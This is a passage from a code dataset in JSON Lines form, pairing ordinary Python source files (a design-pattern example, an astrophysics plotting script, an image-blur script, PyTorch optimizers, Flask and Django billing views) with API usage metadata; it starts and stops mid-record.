"rest_framework.filters.OrderingFilter", "line_number": 197, "usage_type": "attribute"}, {"api_name": "rest_framework.filters", "line_number": 197, "usage_type": "name"}, {"api_name": "rest_framework.filters.SearchFilter", "line_number": 197, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam.own_objects.filter", "line_number": 206, "usage_type": "call"}, {"api_name": "examiner.models.Exam.own_objects", "line_number": 206, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 206, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 210, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 212, "usage_type": "name"}, {"api_name": "examiner.models.Exam.objects.get", "line_number": 215, "usage_type": "call"}, {"api_name": "examiner.models.Exam.objects", "line_number": 215, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 215, "usage_type": "name"}, {"api_name": "examiner.models.Exam.DoesNotExist", "line_number": 216, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 216, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 217, "usage_type": "name"}, {"api_name": "examiner.models.Exam", "line_number": 220, "usage_type": "name"}, {"api_name": "examiner.serializers.ExamListSerializer", "line_number": 221, "usage_type": "call"}, {"api_name": "examiner.models.Exam", "line_number": 221, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 222, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 222, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 222, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 226, "usage_type": "name"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 228, "usage_type": "name"}, {"api_name": "examiner.models.Exam.objects.get", "line_number": 231, "usage_type": "call"}, {"api_name": "examiner.models.Exam.objects", "line_number": 231, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 231, "usage_type": "name"}, {"api_name": "examiner.models.Exam.DoesNotExist", "line_number": 232, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 232, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 233, "usage_type": "name"}, {"api_name": "examiner.models.Exam", "line_number": 236, "usage_type": "name"}, {"api_name": "examiner.serializers.ExamSerializer", "line_number": 237, "usage_type": "call"}, {"api_name": "examiner.models.Exam", "line_number": 237, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 238, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 238, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 238, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 242, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 244, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 244, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsOwnExaminerPermission", "line_number": 244, "usage_type": "name"}, {"api_name": "examiner.models.Exam.everything.get", "line_number": 248, "usage_type": "call"}, {"api_name": "examiner.models.Exam.everything", "line_number": 248, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 248, "usage_type": "name"}, {"api_name": "examiner.models.Exam.DoesNotExist", "line_number": 249, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 249, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 250, "usage_type": "name"}, {"api_name": "examiner.serializers.ExamSerializer", "line_number": 255, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 258, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 258, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 258, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 259, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 259, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 259, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 263, "usage_type": "name"}, {"api_name": "examiner.renderers.ExamRenderer", "line_number": 264, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 265, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 265, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsOwnExaminerPermission", "line_number": 265, "usage_type": "name"}, {"api_name": "examiner.models.Exam.everything.get", "line_number": 269, "usage_type": "call"}, {"api_name": "examiner.models.Exam.everything", "line_number": 269, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 269, "usage_type": "name"}, {"api_name": "examiner.models.Exam.DoesNotExist", "line_number": 270, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 270, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 271, "usage_type": "name"}, {"api_name": "examiner.models.Exam", "line_number": 274, "usage_type": "name"}, {"api_name": "examiner.models.Exam", "line_number": 275, "usage_type": "argument"}, {"api_name": "examiner.models.Exam.soft_delete", "line_number": 276, "usage_type": "call"}, {"api_name": "examiner.models.Exam", "line_number": 276, "usage_type": "name"}, {"api_name": "examiner.models.Exam.is_updated", "line_number": 277, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 277, "usage_type": "name"}, {"api_name": "examiner.models.Exam.save", "line_number": 278, "usage_type": "call"}, {"api_name": "examiner.models.Exam", "line_number": 278, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 279, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 279, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 279, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 283, "usage_type": "name"}, {"api_name": "examiner.renderers.ExamRenderer", "line_number": 284, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 285, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 285, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsOwnExaminerPermission", "line_number": 285, "usage_type": "name"}, {"api_name": "examiner.models.Exam.everything.get", "line_number": 289, "usage_type": "call"}, {"api_name": "examiner.models.Exam.everything", "line_number": 289, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 289, "usage_type": "name"}, {"api_name": "examiner.models.Exam.DoesNotExist", "line_number": 290, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 290, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 291, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 299, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 299, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 299, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 303, "usage_type": "name"}, {"api_name": "examiner.renderers.ExamRenderer", "line_number": 304, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 305, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 305, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsOwnExaminerPermission", "line_number": 305, "usage_type": "name"}, {"api_name": "examiner.models.Exam.everything.get", "line_number": 309, "usage_type": "call"}, {"api_name": "examiner.models.Exam.everything", "line_number": 309, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 309, "usage_type": "name"}, {"api_name": "examiner.models.Exam.DoesNotExist", "line_number": 310, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 310, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 311, "usage_type": "name"}, {"api_name": "examiner.models.Exam", "line_number": 314, "usage_type": "name"}, {"api_name": "examiner.models.Exam", "line_number": 315, "usage_type": "argument"}, {"api_name": "examiner.models.Exam.deactivate", "line_number": 316, "usage_type": "call"}, {"api_name": "examiner.models.Exam", "line_number": 316, "usage_type": "name"}, {"api_name": "examiner.models.Exam.is_updated", "line_number": 317, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 317, "usage_type": "name"}, {"api_name": "examiner.models.Exam.save", "line_number": 318, "usage_type": "call"}, {"api_name": "examiner.models.Exam", "line_number": 318, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 319, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 319, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 319, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 323, "usage_type": "name"}, {"api_name": "examiner.renderers.ExamRenderer", "line_number": 324, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 325, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 325, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsOwnExaminerPermission", "line_number": 325, "usage_type": "name"}, {"api_name": "examiner.models.Exam.everything.get", "line_number": 329, "usage_type": "call"}, {"api_name": "examiner.models.Exam.everything", "line_number": 329, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 329, "usage_type": "name"}, {"api_name": "examiner.models.Exam.DoesNotExist", "line_number": 330, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 330, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 331, "usage_type": "name"}, {"api_name": "examiner.models.Exam", "line_number": 334, "usage_type": "name"}, {"api_name": "examiner.models.Exam", "line_number": 335, "usage_type": "argument"}, {"api_name": "examiner.models.Exam.activate", "line_number": 336, "usage_type": "call"}, {"api_name": "examiner.models.Exam", "line_number": 336, "usage_type": "name"}, {"api_name": "examiner.models.Exam.is_updated", "line_number": 337, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 337, "usage_type": "name"}, {"api_name": "examiner.models.Exam.save", "line_number": 338, "usage_type": "call"}, {"api_name": "examiner.models.Exam", "line_number": 338, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 339, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 339, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 339, "usage_type": "name"}]} +{"seq_id": "4315218622", "text": "#!/usr/bin/env python\n\n\"\"\"Example of the adapter pattern.\n\nThe Adapter Pattern is useful to either either map two different interfaces or\nto just modify (wrap) an existing API.\n\"\"\"\n\nfrom datetime import datetime\n\n\nclass AnnoyingAPI(object):\n def method_with_annoying_arguments(self, month, date, year, minute, second):\n return str(month) + '/' + str(date) + '/' + str(year)\n\n\nclass AnnoyingAdapter(object):\n def __init__(self):\n self.annoying_api = AnnoyingAPI()\n\n def nicer_method(self, time_object):\n mo = time_object.month\n d = time_object.day\n y = time_object.year\n mi = time_object.minute\n s = time_object.second\n return self.annoying_api.method_with_annoying_arguments(mo, d, y, mi, s)\n\n\nif __name__ == '__main__':\n adapter = AnnoyingAdapter()\n r = adapter.nicer_method(datetime.now())\n print(r)", "repo_name": "gijs/python-design-patterns", "sub_path": "adapter.py", "file_name": "adapter.py", "file_ext": "py", "file_size_in_byte": 875, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.now", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "40538503071", "text": "import json\r\nfrom jinja2 import Environment,FileSystemLoader\r\n\r\nwith open('project.json') as f:\r\n data = json.load(f)\r\nfileLoader=FileSystemLoader(\"templates\")\r\nenv=Environment(loader=fileLoader)\r\n\r\nrender=env.get_template(\"design.html\").render(data=data,title=\"simple page\")\r\n\r\nfileName=\"index.html\"\r\n\r\nwith open(f\"./site/{fileName}\",\"w\")as f:\r\n f.write(render)", "repo_name": "ckchetan/IOT-Ready-project", "sub_path": "project.py", "file_name": "project.py", "file_ext": "py", "file_size_in_byte": 367, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 5, "usage_type": "call"}, {"api_name": "jinja2.FileSystemLoader", "line_number": 6, "usage_type": "call"}, {"api_name": "jinja2.Environment", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "19258980959", "text": "\n\n'''\nPlots distribution of OVI absorbing cells' \nspherical velocities\n'''\n\nfrom __future__ import print_function\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nloc = '/home/jacob/research/code/analysis/ovi/'\nfilename = 'vela2b-{0:d}.a0.490.i90_OVIcellsGalFrame.h5'\ngalNums = range(21,30)\n\nfor i,galNum in enumerate(galNums):\n\n fname = loc+filename.format(galNum)\n try:\n df = pd.read_hdf(fname,'data')\n except IOError:\n continue\n \n if i==0:\n cells = df.copy()\n else:\n cells = pd.concat([cells,df])\n\nprint(len(cells))\n\ncellMajor = cells[cells['cellPlane']]\ncellMinor = cells[cells['cellOutflow']]\nlosMajor = cells[cells['losPlane']]\nlosMinor = cells[cells['losOutflow']]\n\nfig,ax = plt.subplots(3,3,figsize=(15,15),sharey='row',sharex=True)\n\nfields = 'vr vphi vtheta'.split()\nlabels = 'Radial Polar Rotating'.split()\nbins = np.linspace(-800,800,50)\n\ncols = ('vr_mean vr_std vr_skew'.split() + \n 'vPolar_mean vPolar_std vPolar_skew'.split() + \n 'vRotate_mean vRotate_std vRotate_skew'.split())\nprefix = 'vr vPolar vRotate'.split()\nrows = 'full cell_major cell_minor los_major los_minor'.split()\n\nstats = pd.DataFrame(columns=cols,index=rows)\n\nfor i,(field,label) in enumerate(zip(fields,labels)):\n \n # First row is entire sample\n ax[0,i].hist(cells[field],bins=bins,normed=True,histtype='step',color='black',label='Full')\n\n stats[prefix[i]+'_mean'].loc['full'] = cells[field].mean()\n stats[prefix[i]+'_std'].loc['full'] = cells[field].std()\n stats[prefix[i]+'_skew'].loc['full'] = cells[field].skew()\n print('Field: {0:s}\\t Full\\t Num Nan: {1:d}'.format(field, \n cells[field].isnull().sum()))\n\n # Second row is major/minor split as defined by cells\n ax[1,i].hist(cellMajor[field],bins=bins,normed=True,histtype='step',\n color='red',label='Cell Major')\n ax[1,i].hist(cellMinor[field],bins=bins,normed=True,histtype='step',\n color='blue',label='Cell Minor')\n\n stats[prefix[i]+'_mean'].loc['cell_major'] = cellMajor[field].mean()\n stats[prefix[i]+'_std'].loc['cell_major'] = cellMajor[field].std()\n stats[prefix[i]+'_skew'].loc['cell_major'] = cellMajor[field].skew()\n\n stats[prefix[i]+'_mean'].loc['cell_minor'] = cellMinor[field].mean()\n stats[prefix[i]+'_std'].loc['cell_minor'] = cellMinor[field].std()\n stats[prefix[i]+'_skew'].loc['cell_minor'] = cellMinor[field].skew()\n\n print('Field: {0:s}\\t Cell Major\\t Num Nan: {1:d}'.format(field, \n cellMajor[field].isnull().sum()))\n print('Field: {0:s}\\t Cell Minor\\t Num Nan: {1:d}'.format(field, \n cellMinor[field].isnull().sum()))\n\n # Third row is major/minor split as defined by LOS\n ax[2,i].hist(losMajor[field],bins=bins,normed=True,histtype='step',\n color='red',label='LOS Major')\n ax[2,i].hist(losMinor[field],bins=bins,normed=True,histtype='step',\n color='blue',label='LOS Minor')\n\n stats[prefix[i]+'_mean'].loc['los_major'] = losMajor[field].mean()\n stats[prefix[i]+'_std'].loc['los_major'] = losMajor[field].std()\n stats[prefix[i]+'_skew'].loc['los_major'] = losMajor[field].skew()\n\n stats[prefix[i]+'_mean'].loc['los_minor'] = losMinor[field].mean()\n stats[prefix[i]+'_std'].loc['los_minor'] = losMinor[field].std()\n stats[prefix[i]+'_skew'].loc['los_minor'] = losMinor[field].skew()\n\n print('Field: {0:s}\\t LOS Major\\t Num Nan: {1:d}'.format(field, \n losMajor[field].isnull().sum()))\n print('Field: {0:s}\\t LOS Minor\\t Num Nan: {1:d}'.format(field, \n losMinor[field].isnull().sum()))\n\n# Label\nfor a in ax.flatten():\n a.set_xlim([-800,800])\n a.legend(loc='best')\n\nfor a,label in zip(ax[-1,:],labels):\n a.set_xlabel('{0:s} Velocity [km/s]'.format(label))\n\nfor a in ax[:,0]:\n a.set_ylabel('Relative Counts')\n\nfig.subplots_adjust(hspace=0.05,wspace=0)\nfig.savefig('oviSphericalVelocitiesDist.png',bbox_inches='tight',dpi=300)\n\nstats.to_csv('oviSphericalVelocitiesBulk.csv')\n\n\n\n\n", "repo_name": "jrvliet/analysis", "sub_path": "ovi/sphericalVelocityAnalysis.py", "file_name": "sphericalVelocityAnalysis.py", "file_ext": "py", "file_size_in_byte": 4012, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_hdf", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "23199919774", "text": "import cv2\nimport numpy as np\nfrom scipy.signal import convolve2d\n\n\nimages = ['./final/input1.png', './final/input2.png', './final/input3.png', './final/input4.png']\n\ndef streak_kernel(shape):\n # Example kernel simulating horizontal motion blur\n ny, nx = shape\n k = np.zeros(shape)\n k[ny//2-1, :] = 0.5\n k[ny//2+0, :] = 1.\n k[ny//2+1, :] = 0.5\n k[:, 0] *= 0.\n k[:, 1] *= 0.5\n k[:, -2] *= 0.5\n k[:, -1] *= 0.\n k /= np.sum(k)\n return k\n\nk = streak_kernel((31,31))\ncount = 1\n\n\nfor file in images:\n\n img = cv2.imread(file)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\n y = convolve2d(img, k, mode='same', boundary='wrap')\n path = './final/final' + str(count) + '.jpg'\n cv2.imwrite(path, y)\n\n# y = convolve2d(img, k, mode='same', boundary='wrap')\n# path = 'final' + str(count) + '.jpg'\n# cv2.imwrite(path, y)\n# count += 1\n\n# image = \"adcd.png\"\n\n\n", "repo_name": "laksh-nanwani/dip-project", "sub_path": "motionBlur.py", "file_name": "motionBlur.py", "file_ext": "py", "file_size_in_byte": 895, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.zeros", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 29, "usage_type": "attribute"}, {"api_name": "scipy.signal.convolve2d", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "24843507038", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 25 17:52:56 2023\r\n\r\n@author: oowoyele\r\n\"\"\"\r\n\r\nimport torch\r\n\r\n\r\nclass optimizer(): # fully connected neural network class\r\n def __init__(self, fcn = None, parameters = None, learning_rate = 0.01):\r\n \r\n if parameters == None:\r\n self.parameters = fcn.parameters\r\n else:\r\n self.parameters = parameters\r\n \r\n self.optim = torch.optim.Adam(parameters, lr=learning_rate)\r\n #self.fcn = fcn\r\n \r\n \r\n def step(self, loss):\r\n #self.fcn.pred()\r\n #mse = self.fcn.mse()\r\n #torch.autograd.set_detect_anomaly(True)\r\n self.optim.zero_grad()\r\n loss.backward(retain_graph=True)\r\n self.optim.step()\r\n \r\n \r\nclass optimizerMoE(): # fully connected neural network class\r\n def __init__(self, fcn_list = None, parameters = None, learning_rate = 0.01):\r\n\r\n if fcn_list is not None:\r\n fcn_given = True\r\n self.num_experts = len(fcn_list)\r\n elif parameters is not None:\r\n params_given = True\r\n self.num_experts = len(parameters)\r\n \r\n self.optim = []\r\n #self.fcn_list = fcn_list\r\n self.mse_list = [[]]*len(fcn_list)\r\n \r\n for iexp in range(self.num_experts):\r\n if fcn_given:\r\n self.parameters = fcn_list[iexp].parameters\r\n elif params_given:\r\n self.parameters = parameters[iexp]\r\n \r\n self.optim += [torch.optim.Adam(self.parameters, lr=learning_rate)]\r\n if fcn_given:\r\n self.mse_list[iexp] = fcn_list[iexp].mse()\r\n \r\n \r\n def step(self, loss_list):\r\n for iexp in range(self.num_experts):\r\n self.optim[iexp].zero_grad()\r\n loss_list[iexp].backward(retain_graph=True)\r\n self.optim[iexp].step()\r\n #fcn.pred()\r\n #loss_list[iexp] = fcn.mse()", "repo_name": "DMO-LAB/AdaptiveML", "sub_path": "optimize.py", "file_name": "optimize.py", "file_ext": "py", "file_size_in_byte": 1982, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.optim.Adam", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 52, "usage_type": "attribute"}]} +{"seq_id": "26480555064", "text": "\"\"\"Failed Email views.\"\"\"\n# Third-Party Libraries\nfrom flask import jsonify, request\nfrom flask.views import MethodView\n\n# cisagov Libraries\nfrom api.manager import FailedEmailManager, SubscriptionManager, TargetManager\nfrom utils.logging import setLogger\nfrom utils.mailgun import get_failed_email_events\n\nlogger = setLogger(__name__)\n\nfailed_email_manager = FailedEmailManager()\nsubscription_manager = SubscriptionManager()\ntarget_manager = TargetManager()\n\n\nclass FailedEmailsView(MethodView):\n \"\"\"FailedEmailsView.\"\"\"\n\n def get(self):\n \"\"\"Get.\"\"\"\n success = get_failed_email_events()\n # Allow querying a list of failed emails\n parameters = failed_email_manager.get_query(request.args)\n parameters[\"removed\"] = {\"$in\": [False, None]}\n if request.args.get(\"removed\", \"\").lower() == \"true\":\n parameters[\"removed\"] = True\n success[\"failed_emails\"] = failed_email_manager.all(params=parameters)\n return jsonify(success)\n\n\nclass FailedEmailView(MethodView):\n \"\"\"FailedEmailView.\"\"\"\n\n def delete(self, failed_email_id):\n \"\"\"Delete.\"\"\"\n failed_email = failed_email_manager.get(document_id=failed_email_id)\n failed_email[\"removed\"] = True\n subscriptions = subscription_manager.all(\n params={\n \"target_email_list\": {\n \"$elemMatch\": {\n \"email\": failed_email[\"recipient\"],\n }\n },\n }\n )\n for subscription in subscriptions:\n try:\n target = next(\n (\n target\n for target in subscription[\"target_email_list\"]\n if target[\"email\"] == failed_email[\"recipient\"]\n ),\n None,\n )\n subscription_manager.delete_from_list(\n document_id=subscription[\"_id\"],\n field=\"target_email_list\",\n data=target,\n )\n except Exception as e:\n logger.exception(e)\n failed_email[\"removed\"] = False\n failed_email_manager.update(\n document_id=failed_email_id,\n data=failed_email,\n )\n return jsonify({\"success\": True})\n", "repo_name": "cisagov/con-pca-api", "sub_path": "src/api/views/failed_email_views.py", "file_name": "failed_email_views.py", "file_ext": "py", "file_size_in_byte": 2346, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.logging.setLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "api.manager.FailedEmailManager", "line_number": 13, "usage_type": "call"}, {"api_name": "api.manager.SubscriptionManager", "line_number": 14, "usage_type": "call"}, {"api_name": "api.manager.TargetManager", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.views.MethodView", "line_number": 18, "usage_type": "name"}, {"api_name": "utils.mailgun.get_failed_email_events", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.views.MethodView", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "31077095146", "text": "import logging\n\nfrom django.conf import settings\nfrom django.utils.module_loading import import_string\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.timezone import now\nfrom django.http import HttpResponse\nfrom django_filters.rest_framework import DjangoFilterBackend\n\nfrom rest_framework import filters, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_202_ACCEPTED, HTTP_409_CONFLICT\n\nfrom fleio.activitylog.utils.decorators import log_enduser_activity\nfrom fleio.billing import utils\nfrom fleio.billing.models.invoice import InvoiceStatus\nfrom fleio.billing.operations import get_invoice_payment_options\nfrom fleio.core.drf import EndUserOnly\nfrom fleio.core.models import Client\nfrom fleio.core.models import get_default_currency\nfrom fleio.core.filters import CustomFilter\nfrom fleio.billing.invoicing import tasks\nfrom fleio.billing.models import Invoice, TaxRule\nfrom fleio.billing.models import ClientCredit\nfrom fleio.billing.settings import BillingItemTypes\nfrom .serializers import InvoiceBriefSerializer, InvoiceDetailSerializer\nfrom fleio.billing.serializers import AddCreditSerializer\nfrom fleio.billing.invoicing.pdf import pdf_invoice\nfrom io import BytesIO\n\nLOG = logging.getLogger(__name__)\n\n\n@log_enduser_activity(\n category_name='billing', object_name='invoice',\n additional_activities={\n 'pay_from_credit_balance': _('User {username} ({user_id}) paid invoice {object_id} using credit.'),\n }\n)\nclass InvoiceViewSet(viewsets.ReadOnlyModelViewSet):\n model = Invoice\n permission_classes = (EndUserOnly,)\n filter_backends = (filters.OrderingFilter, DjangoFilterBackend, CustomFilter, filters.SearchFilter)\n filter_fields = ('status', 'client', 'id')\n ordering_fields = ('issue_date', 'due_date', 'status', 'client',)\n search_fields = ('id', 'first_name', 'last_name', 'status', 'due_date', 'number')\n ordering = ['id']\n\n def get_queryset(self):\n return Invoice.objects.filter(client__in=self.request.user.clients.all())\n\n def get_serializer_class(self):\n if self.action == 'retrieve':\n return InvoiceDetailSerializer\n else:\n return InvoiceBriefSerializer\n\n @action(detail=False, methods=['POST'])\n def add_credit_invoice(self, request):\n serializer = AddCreditSerializer(data=request.data, context={'request': request})\n serializer.is_valid(raise_exception=True)\n try:\n client = request.user.clients.get(pk=serializer.validated_data['client'])\n except Client.DoesNotExist:\n raise ValidationError({'client': _('Client not found')})\n credit = serializer.validated_data['credit']\n # Look for unpaid invoices already containing credit addition\n credit_invoices_unpaid = Invoice.objects.filter(client=client).unpaid().for_credit()\n if credit_invoices_unpaid.count() > 0:\n raise ValidationError({'detail': _('An unpaid credit invoice already exists')})\n item_description_msg = _('Add {} {} to credit balance').format(credit, client.currency.code)\n item_taxes = []\n if client.billing_settings.add_tax_for_credit_invoices and not client.tax_exempt:\n client_tax_rules = TaxRule.for_country_and_state(\n country=client.country_name,\n state=client.state\n )\n if client_tax_rules:\n for tax_rule in client_tax_rules:\n tax_amount = (credit * tax_rule.rate) / 100\n tax_amount = utils.cdecimal(tax_amount, q='.01')\n item_taxes.append({'name': tax_rule.name,\n 'amount': tax_amount,\n 'tax_rule': tax_rule.id})\n invoice_id = tasks.invoice_create(\n client.pk,\n items=[{\n 'item_type': BillingItemTypes.credit,\n 'amount': credit,\n 'description': item_description_msg,\n 'taxed': True if len(item_taxes) else False,\n 'taxes': item_taxes,\n }],\n currency=client.currency.code,\n issue_date=now().isoformat(),\n due_date=now().isoformat()\n )\n return Response({'id': invoice_id})\n\n @action(detail=True, methods=['GET'])\n def payment_options(self, request, pk):\n invoice = self.get_object()\n return Response(get_invoice_payment_options(invoice=invoice))\n\n @action(detail=True, methods=['POST'])\n def pay_from_credit_balance(self, request, pk):\n invoice = self.get_object()\n if invoice.is_credit_invoice():\n # NOTE(tomo): do not allow payment from credit balance if this is a credit invoice\n return Response({'detail': _('Unable to pay a credit invoice with credit')}, status=HTTP_409_CONFLICT)\n if not invoice.is_unpaid():\n # NOTE(tomo): only unpaid invoices should be allowed\n return Response({'detail': _('Only unpaid invoices can be paid from credit')}, status=HTTP_409_CONFLICT)\n\n invoice_has_default_currency = True if invoice.currency.code == get_default_currency().code else False\n if not invoice_has_default_currency:\n try:\n credit_balance = invoice.client.credits.get(currency=invoice.currency).amount\n except ClientCredit.DoesNotExist as e:\n LOG.error(e)\n credit_balance = 0\n else:\n credit_balance = invoice.client.uptodate_credit\n if credit_balance <= 0:\n return Response({'detail': _('Not enough credit')}, status=HTTP_409_CONFLICT)\n\n invoice_balance = invoice.balance\n # don't allow payment if the remaining credit (only for up to date credit in default currency) will be less\n # than the minimum specified in client's configuration after paying the invoice\n if invoice_has_default_currency:\n min_credit_to_be_left = invoice.client.billing_settings.minim_uptodate_credit_for_invoice_payment\n not_enough_credit_response = Response(\n data={'detail': _('You should have at least {} {} credit left after making a payment')\n .format(min_credit_to_be_left, invoice.client.currency)},\n status=HTTP_409_CONFLICT\n )\n if credit_balance >= invoice_balance:\n if credit_balance - invoice_balance < min_credit_to_be_left:\n return not_enough_credit_response\n elif min_credit_to_be_left > 0:\n return not_enough_credit_response\n\n amount = 0\n\n if invoice_balance >= credit_balance > 0:\n amount = credit_balance\n elif credit_balance > invoice_balance > 0:\n amount = invoice_balance\n\n currency_code = invoice.client.currency.code\n tasks.invoice_add_payment.delay(\n invoice.id,\n amount=amount,\n 